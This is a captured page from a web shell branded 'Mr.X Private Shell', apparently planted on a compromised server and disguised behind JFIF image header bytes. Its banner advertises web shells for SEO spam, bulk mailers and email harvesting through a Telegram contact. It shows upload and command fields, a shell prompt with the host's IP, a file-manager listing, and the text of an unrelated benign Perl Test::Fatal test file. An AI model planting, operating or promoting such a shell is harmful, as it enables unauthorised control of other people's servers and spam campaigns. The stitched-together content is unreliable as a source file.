����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
#!/usr/bin/perl

use strict;

use Test::Builder::Tester tests => 6;

use Test::Fatal qw( dies_ok lives_ok );

test_out( "ok 1 - died" );
dies_ok { die "FAIL" } 'died';
test_test( "die dies" );

test_out( "ok 1 - code should throw an exception" );
dies_ok { die "FAIL" };
test_test( "die dies (default description)" );

test_out( "not ok 1 - returned" );
test_fail( +2 );
test_err( "# expected an exception but none was raised" );
dies_ok { return 1 } 'returned';
test_test( "return doesn't die" );

test_out( "ok 1 - returned" );
lives_ok { return 1 } 'returned';
test_test( "return lived" );

test_out( "ok 1 - code should not throw an exception" );
lives_ok { return 1 };
test_test( "return lived (default description)" );

test_out( "not ok 1 - died" );
test_fail( +2 );
test_err( "# expected return but an exception was raised" );
lives_ok { die "FAIL" } 'died';
test_test( "die doesn't live" );

Filemanager

Name Type Size Permission Actions
00-report-prereqs.dd File 1.55 KB 0644
00-report-prereqs.t File 5.88 KB 0644
basic.t File 1.46 KB 0644
like-exception.t File 900 B 0644
todo.t File 3.17 KB 0755